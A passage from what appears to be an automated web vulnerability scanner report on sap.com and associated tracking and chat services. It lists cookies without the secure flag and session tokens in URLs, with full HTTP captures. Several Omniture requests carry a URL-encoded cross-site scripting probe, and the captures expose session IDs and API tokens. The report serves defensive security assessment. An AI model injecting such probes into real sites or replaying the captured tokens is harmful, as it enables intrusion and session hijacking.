Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:40 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:39 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>

8.18. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:44 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:43 GMT
Content-Length: 12160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...

8.19. https://www.sap.com/profile/warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:52 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...

8.20. https://www.sap.com/sme/contactsap/FormCodesRemote.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/FormCodesRemote.epi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /sme/contactsap/FormCodesRemote.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 86
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

{"method":"GetCodeTranslationsByParentCategoryWithLocaleID","arguments":[1,"",2,1033]}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Content-Length: 36

"new Array(1,'',2,1033,new Array())"

8.21. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...

8.22. https://www.sme.sap.com/irj/sme/cpslogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/plain
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
Location: https://www.sme.sap.com:443/irj/sme/logon
Content-Length: 0
Date: Sat, 15 Oct 2011 14:32:52 GMT
Connection: keep-alive
Set-Cookie: saplb_*=(J2EE3417600)3417650; Version=1; Path=/; HttpOnly; secure
Set-Cookie: Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; Domain=.sme.sap.com; Expires=Thu, 02-Nov-2079 17:46:59 GMT; Path=/; secure
Set-Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; Domain=www.sme.sap.com; Path=/irj/sme; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; Version=1; Path=/; HttpOnly; secure
Set-Cookie: SDNSTATE=526651564.14340.0000; path=/


9. Session token in URL  previous  next
There are 10 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://nmp.newsgator.com/NGBuzz/buzz.ashx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Fri, 07 Oct 2011 20:13:12 GMT
ETag: 634536151927656250
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3764
Cache-Control: public, max-age=564
Date: Sat, 15 Oct 2011 14:24:28 GMT
Connection: close

try{var buzzTemplate_215423="\t{stringify CustomFooter}\n\t\t<div class=\"footerClass\">\n\t\t\t<!--- Style up your footer --->\n\t\t\t<a style=\"cursor: pointer;\" href=\"javascript:void(0)\" onclick
...[SNIP]...

9.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=05672&profile.geo_gmt_offset=-400&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=vt&profile.geo_region_code=46&profile.geo_city=stowe&profile.geo_city_code=7029&mbox=omniTargetingInfo&mboxId=0&mboxTime=1318668441221&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:03 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 2562
Date: Sat, 15 Oct 2011 13:47:02 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

9.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:20 GMT; Path=/m2/omnituremarketing
Content-Length: 220
Date: Sat, 15 Oct 2011 13:47:19 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

9.4. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:08 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1042
Date: Sat, 15 Oct 2011 13:47:08 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-st
...[SNIP]...

9.5. http://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/37021986/?&visitor=546022977410&msessionkey=449600187523043155&site=37021986&cmd=mTagUrl&lpCallId=956909634864-544208121774&protV=20&lpjson=1&SV%21impression-query-name=voice-sales-sap-general-us-en-1&SV%21impression-query-room=voice-sales-sap-general-us-en-1&id=4277119246&info=button-impression%3Avoice-sales-sap-general-us-en-1%28SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP%29&waitForVisitor=true&d=1318688497247&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:21:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:21:18 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"956909634864-544208121774","lpCallConfirm":"","lpData":[{"result":56}]}});

9.6. http://sales.liveperson.net/hc/37021986/cmd/url/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/37021986/cmd/url/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/37021986/cmd/url/?site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!click-query-name=voice-sales-sap-general-us-en-1&SV!click-query-room=voice-sales-sap-general-us-en-1&SV!click-query-state=Available&SV!click-query-channel=voice&page=http%3A//sales.liveperson.net/hc/37021986/%3Fcmd%3Dfile%26file%3DvisitorWantsToTalk%26site%3D37021986%26visitor%3D546022977410%26msessionkey%3D449600187523043155%26SV%21EngageRoom%3Dsales-sap-general-us-en%26SV%21chat-button-name%3Dvoice-sales-sap-general-us-en-1%26SV%21chat-button-room%3Dvoice-sales-sap-general-us-en-1%26referrer%3D%28button%2520dynamic-button%3Avoice-sales-sap-general-us-en-1%28SAP%2520Business%2520Management%2520Software%2520Solutions%252C%2520Applications%2520and%2520Services%2520%257C%2520SAP%29%29%2520http%253A//www.sap.com/index.epx&id=8140355572&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1318690564635 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
